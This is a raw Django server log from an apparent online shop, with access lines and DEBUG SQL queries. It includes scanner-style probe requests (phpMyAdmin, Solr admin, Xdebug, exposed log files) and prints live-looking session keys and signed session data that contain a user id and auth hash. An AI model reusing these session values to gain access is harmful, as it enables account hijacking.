HTTP/1.0" 200 1786 [09/Dec/2019 10:39:41] "GET / HTTP/1.0" 302 0 [09/Dec/2019 10:44:43] "GET / HTTP/1.0" 302 0 [09/Dec/2019 10:49:46] "GET / HTTP/1.0" 302 0 [09/Dec/2019 10:54:48] "GET / HTTP/1.0" 302 0 [09/Dec/2019 10:59:51] "GET / HTTP/1.0" 302 0 [09/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 11:10:06] "GET / HTTP/1.0" 302 0 [09/Dec/2019 11:16:28] "GET / HTTP/1.0" 302 0 [09/Dec/2019 11:21:31] "GET / HTTP/1.0" 302 0 [09/Dec/2019 11:26:34] "GET / HTTP/1.0" 302 0 [09/Dec/2019 11:31:36] "GET / HTTP/1.0" 302 0 [09/Dec/2019 11:36:39] "GET / HTTP/1.0" 302 0 Not Found: /index.php [09/Dec/2019 11:38:53] "GET /index.php HTTP/1.0" 404 6620 Not Found: /phpmyadmin/index.php [09/Dec/2019 11:38:54] "GET /phpmyadmin/index.php HTTP/1.0" 404 6653 [09/Dec/2019 11:41:42] "GET / HTTP/1.0" 302 0 [09/Dec/2019 11:46:44] "GET / HTTP/1.0" 302 0 Not Found: /access.log [09/Dec/2019 11:48:20] "GET /access.log HTTP/1.0" 404 6624 [09/Dec/2019 11:51:47] "GET / HTTP/1.0" 302 0 [09/Dec/2019 11:56:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 12:03:20,492 utils 32196 139885050582784 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-09T12:03:20.480737+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 9, 12, 3, 20, 480737, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-09 12:03:20,497 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-09 12:03:20,538 utils 32196 139885050582784 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-09 12:03:20,549 utils 32196 139885050582784 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-23T12:03:20.547176+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 23, 12, 3, 20, 547176, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [09/Dec/2019 12:03:20] "GET / HTTP/1.0" 200 8868 [09/Dec/2019 12:05:02] "GET / HTTP/1.0" 302 0 [09/Dec/2019 12:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [09/Dec/2019 12:10:05] "GET / HTTP/1.0" 302 0 [09/Dec/2019 12:15:08] "GET / HTTP/1.0" 302 0 [09/Dec/2019 12:24:07] "GET / HTTP/1.0" 302 0 [09/Dec/2019 12:29:10] "GET / HTTP/1.0" 302 0 [09/Dec/2019 12:34:13] "GET / HTTP/1.0" 302 0 [09/Dec/2019 12:39:15] "GET / HTTP/1.0" 302 0 [09/Dec/2019 12:44:18] "GET / HTTP/1.0" 302 0 [09/Dec/2019 12:49:21] "GET / HTTP/1.0" 302 0 [09/Dec/2019 12:54:24] "GET / HTTP/1.0" 302 0 [09/Dec/2019 12:59:26] "GET / HTTP/1.0" 302 0 [09/Dec/2019 13:04:53] "GET / HTTP/1.0" 302 0 [09/Dec/2019 13:10:04] "GET / HTTP/1.0" 302 0 [09/Dec/2019 13:16:57] "GET / HTTP/1.0" 302 0 [09/Dec/2019 13:22:00] "GET / HTTP/1.0" 302 0 [09/Dec/2019 13:27:02] "GET / HTTP/1.0" 302 0 [09/Dec/2019 13:32:05] "GET / HTTP/1.0" 302 0 [09/Dec/2019 13:37:08] "GET / HTTP/1.0" 302 0 [09/Dec/2019 13:40:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 13:40:06,680 utils 32196 139885050582784 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'nvgqv1qy7xjpnuyur7jhckxuiyfc4kcv' LIMIT 1; args=('nvgqv1qy7xjpnuyur7jhckxuiyfc4kcv',) DEBUG 2019-12-09 13:40:06,682 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('nvgqv1qy7xjpnuyur7jhckxuiyfc4kcv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T13:40:06.681428+00:00'::timestamptz); args=('nvgqv1qy7xjpnuyur7jhckxuiyfc4kcv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 13, 40, 6, 681428, tzinfo=)) [09/Dec/2019 13:40:06] "GET /login/?next=/ HTTP/1.0" 200 1786 [09/Dec/2019 13:42:10] "GET / HTTP/1.0" 302 0 [09/Dec/2019 13:47:13] "GET / HTTP/1.0" 302 0 Not Found: /solr/admin/info/system [09/Dec/2019 13:47:41] "GET /solr/admin/info/system?wt=json HTTP/1.0" 404 6667 [09/Dec/2019 13:52:16] "GET / HTTP/1.0" 302 0 [09/Dec/2019 13:57:19] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 14:04:46,901 utils 32196 139885050582784 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 14:04:46,908 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 14:04:46,913 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 14:04:46,917 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 14:04:46,921 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 14:04:46,925 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 14:04:46,929 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 14:04:46,933 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 14:04:46,937 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 14:04:46,941 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 14:04:46,946 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 14:04:46] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 14:10:05] "GET / HTTP/1.0" 302 0 [09/Dec/2019 14:17:55] "GET / HTTP/1.0" 302 0 [09/Dec/2019 14:20:59] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-09 14:21:00,151 utils 32196 139885050582784 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'aeq6u03v2fwcas42shrp7jla1cfiqm32' LIMIT 1; args=('aeq6u03v2fwcas42shrp7jla1cfiqm32',) DEBUG 2019-12-09 14:21:00,154 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('aeq6u03v2fwcas42shrp7jla1cfiqm32', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T14:21:00.152227+00:00'::timestamptz); args=('aeq6u03v2fwcas42shrp7jla1cfiqm32', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 14, 21, 0, 152227, tzinfo=)) [09/Dec/2019 14:21:00] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [09/Dec/2019 14:22:57] "GET / HTTP/1.0" 302 0 [09/Dec/2019 14:28:00] "GET / HTTP/1.0" 302 0 Not Found: /solr/admin/info/system [09/Dec/2019 14:29:34] "GET /solr/admin/info/system?wt=json HTTP/1.0" 404 6667 [09/Dec/2019 14:33:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 14:36:44,175 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 14:36:44,180 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 14:36:44,183 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 14:36:44,185 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 14:36:44,187 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 14:36:44,189 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 14:36:44,191 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 14:36:44,194 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 14:36:44,196 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 14:36:44,198 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 14:36:44,200 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 14:36:44] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 14:36:44] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [09/Dec/2019 14:36:44] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [09/Dec/2019 14:36:44] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [09/Dec/2019 14:36:44] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 [09/Dec/2019 14:36:44] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [09/Dec/2019 14:36:44] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [09/Dec/2019 14:36:44] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [09/Dec/2019 14:36:44] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [09/Dec/2019 14:36:44] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [09/Dec/2019 14:36:45] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 DEBUG 2019-12-09 14:36:48,319 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 14:36:48,327 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 14:36:48,333 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 14:36:48,338 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 14:36:48,342 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 14:36:48,345 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 14:36:48,347 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 14:36:48,349 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 14:36:48,352 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 14:36:48,354 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 14:36:48,356 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 14:36:48] "GET /api/v1/categories/ HTTP/1.0" 200 1619 Not Found: /access.log-20191125.gz [09/Dec/2019 14:41:48] "GET /access.log-20191125.gz HTTP/1.0" 404 6660 [09/Dec/2019 14:42:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 14:48:16] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 14:49:20,061 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 14:49:20,066 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 14:49:20,069 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 14:49:20,071 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 14:49:20,073 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 14:49:20,075 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 14:49:20,078 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 14:49:20,080 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 14:49:20,082 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 14:49:20,084 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 14:49:20,088 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 14:49:20] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 14:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [09/Dec/2019 14:53:18] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [09/Dec/2019 14:56:11] "GET /proxy.php HTTP/1.0" 404 6627 [09/Dec/2019 14:58:21] "GET / HTTP/1.0" 302 0 [09/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 15:10:05] "GET / HTTP/1.0" 302 0 [09/Dec/2019 15:15:08] "GET / HTTP/1.0" 302 0 [09/Dec/2019 15:20:11] "GET / HTTP/1.0" 302 